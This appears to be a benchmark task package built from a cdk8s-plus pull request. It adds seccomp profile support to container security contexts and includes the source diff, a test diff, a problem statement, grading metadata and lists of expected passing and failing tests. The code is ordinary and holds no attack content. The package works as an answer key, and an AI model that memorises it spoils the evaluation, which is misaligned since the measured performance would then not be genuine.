"Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Service.constructor(self, scope: Construct, id: string, props: ServiceProps = {}) Location: src/service.ts Inputs: - **scope** – Construct : parent construct in which the Service is defined. - **id** – string : logical identifier for the Service construct. - **props** – ServiceProps : configuration object; now includes optional **publishNotReadyAddresses?: boolean** that, when true, sets the Service spec field `publishNotReadyAddresses`. Outputs: Returns a new **Service** instance. The generated Kubernetes manifest includes `spec.publishNotReadyAddresses` set to the boolean value provided (default false). Description: Constructs a Service resource. The recent signature change adds the `publishNotReadyAddresses` option, allowing callers (e.g., tests) to configure the Service to expose endpoints regardless of readiness status.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 13, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding support for `publishNotReadyAddresses` to the Service construct. The test added checks that when the flag is set to true, the generated Service spec includes `publishNotReadyAddresses: true`, which matches the expected feature behavior. The test assertions align with the implied requirement and do not introduce unrelated expectations. No signals of B‑category problems are present, so the task is classified as solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
cd45d5968ac322367a29972d6fb7af9bcd66c5ba
2024-08-14 10:15:12
cdk8s-team__cdk8s-plus-4521
diff --git a/src/container.ts b/src/container.ts index 77b8d202..f145ff0f 100644 --- a/src/container.ts +++ b/src/container.ts @@ -181,6 +181,37 @@ export enum Capability { WAKE_ALARM = 'WAKE_ALARM', } +export enum SeccompProfileType { + /** + * A profile defined in a file on the node should be used + */ + LOCALHOST = 'Localhost', + /** + * The container runtime default profile should be used + */ + RUNTIME_DEFAULT = 'RuntimeDefault', + /** + * No profile should be applied + */ + UNCONFINED = 'Unconfined', +} + +export interface SeccompProfile { + /** + * localhostProfile indicates a profile defined in a file on the node should be used. + * The profile must be preconfigured on the node to work. Must be a descending path, + * relative to the kubelet's configured seccomp profile location. + * Must only be set if type is "Localhost". + * + * @default - empty string + */ + readonly localhostProfile?: string; + /** + * Indicates which kind of seccomp profile will be applied + */ + readonly type: SeccompProfileType; +} + export interface ContainerSecutiryContextCapabilities { /** * Added capabilities @@ -252,6 +283,13 @@ export interface ContainerSecurityContextProps { * @default none */ readonly capabilities?: ContainerSecutiryContextCapabilities; + + /** + * Container's seccomp profile settings. Only one profile source may be set + * + * @default none + */ + readonly seccompProfile?: SeccompProfile; } /** @@ -331,8 +369,12 @@ export class ContainerSecurityContext { public readonly group?: number; public readonly allowPrivilegeEscalation?: boolean; public readonly capabilities?: ContainerSecutiryContextCapabilities; + public readonly seccompProfile?: SeccompProfile; constructor(props: ContainerSecurityContextProps = {}) { + if (props.seccompProfile?.localhostProfile && props.seccompProfile.type != SeccompProfileType.LOCALHOST) { + throw new Error('localhostProfile must only be set if type is "Localhost"'); + } this.ensureNonRoot = props.ensureNonRoot ?? true; this.privileged = props.privileged ?? false; this.readOnlyRootFilesystem = props.readOnlyRootFilesystem ?? true; @@ -340,6 +382,7 @@ export class ContainerSecurityContext { this.group = props.group; this.allowPrivilegeEscalation = props.allowPrivilegeEscalation ?? false; this.capabilities = props.capabilities; + this.seccompProfile = props.seccompProfile; } /** @@ -354,6 +397,7 @@ export class ContainerSecurityContext { readOnlyRootFilesystem: this.readOnlyRootFilesystem, allowPrivilegeEscalation: this.allowPrivilegeEscalation, capabilities: this.capabilities, + seccompProfile: this.seccompProfile, }; }
feat(container): support seccompProfile in container security context (#4499) # Backport This will backport the following commits from `k8s-30/main` to `k8s-28/main`: - [feat(container): support seccompProfile in container security context (#4499)](https://github.com/cdk8s-team/cdk8s-plus/pull/4499) <!--- Backport version: 8.9.9 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add seccomp profile support to container security contexts **Problem** Container security contexts did not expose any way to configure seccomp profiles, preventing users from applying fine‑grained syscall filtering to their workloads. **Root Cause** The security context model lacked fields and validation logic for seccomp profile configuration. **Fix / Expected Behavior** - Introduce a set of seccomp profile types (Localhost, RuntimeDefault, Unconfined). - Provide a seccomp profile definition that includes the profile type and an optional file‑based profile path. - Add an optional seccompProfile property to the container security context configuration. - Validate that a file‑based profile path can only be supplied when the type is Localhost, otherwise raise a clear error. - Ensure the seccomp profile information is emitted in the generated pod spec when defined. **Risk & Validation** - Confirm that existing container definitions without seccomp settings are unaffected. - Test that an invalid combination of type and localhostProfile triggers the intended runtime error. - Verify that the rendered Kubernetes manifest includes the seccompProfile block only when it is specified.
4,521
cdk8s-team/cdk8s-plus
diff --git a/test/container.test.ts b/test/container.test.ts index f1795cd4..4b4a2ed2 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, Capability, ContainerRestartPolicy, SeccompProfileType } from '../src'; describe('EnvValue', () => { @@ -778,6 +778,7 @@ test('default security context', () => { runAsUser: container.securityContext.user, allowPrivilegeEscalation: container.securityContext.allowPrivilegeEscalation, capabilities: container.securityContext.capabilities, + seccompProfile: container.securityContext.seccompProfile, }); }); @@ -799,6 +800,9 @@ test('custom security context', () => { Capability.BPF, ], }, + seccompProfile: { + type: SeccompProfileType.RUNTIME_DEFAULT, + }, }, }); @@ -809,7 +813,37 @@ test('custom security context', () => { expect(container.securityContext.group).toEqual(2000); expect(container.securityContext.capabilities?.add).toEqual(['AUDIT_CONTROL']); expect(container.securityContext.capabilities?.drop).toEqual(['BPF']); + expect(container.securityContext.seccompProfile?.type).toEqual('RuntimeDefault'); + +}); +test('seccompProfile localhostProfile can not be used if type is not Localhost', () => { + + const container = new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: SeccompProfileType.LOCALHOST, + localhostProfile: 'localhostProfile', + }, + }, + }); + + const spec = container._toKube(); + expect(spec.securityContext?.seccompProfile?.localhostProfile).toEqual('localhostProfile'); +}); + +test('seccompProfile localhostProfile must only be set if type is Localhost', () => { + + expect(() => new Container({ + image: 'image', + securityContext: { + seccompProfile: { + type: SeccompProfileType.UNCONFINED, + localhostProfile: 'localhostProfile', + }, + }, + })).toThrowError('localhostProfile must only be set if type is "Localhost"'); }); test('can configure a postStart lifecycle hook', () => {
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can mutate metadata", "default configuration", "custom configuration", "Can be isolated", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "fromCommand", "fromHttpGet", "fromTcpSocket", "can select namespaces", "can select all namespaces", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "default security context", "custom security context", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it" ]
Enum: SeccompProfileType Location: src/container.ts Inputs: None (enumeration values) Outputs: Enum members: LOCALHOST = 'Localhost', RUNTIME_DEFAULT = 'RuntimeDefault', UNCONFINED = 'Unconfined' Description: Enumerates the supported seccomp profile types for a container's security context. Used to specify whether a profile is a localhost file, the runtime default, or no profile. Interface: SeccompProfile Location: src/container.ts Inputs: - type: SeccompProfileType (required) – indicates which kind of seccomp profile will be applied. - localhostProfile?: string (optional) – path to a localhost seccomp profile; must only be set when `type` is `SeccompProfileType.LOCALHOST`. Outputs: Object conforming to the interface; runtime validation throws an Error if `localhostProfile` is provided while `type` is not `LOCALHOST`. Description: Defines the shape of the seccomp profile configuration that can be attached to a container's security context. The test suite validates correct construction and error handling for improper combinations. Method: ContainerSecurityContext.constructor(props?: ContainerSecurityContextProps) Location: src/container.ts Inputs: - props: ContainerSecurityContextProps – optional configuration object. Added field `seccompProfile?: SeccompProfile` to the existing properties. Outputs: Instance of `ContainerSecurityContext` with a `seccompProfile` property reflecting the supplied configuration. Throws an Error with message `localhostProfile must only be set if type is "Localhost"` if validation fails. Description: Constructs a container security context, now supporting 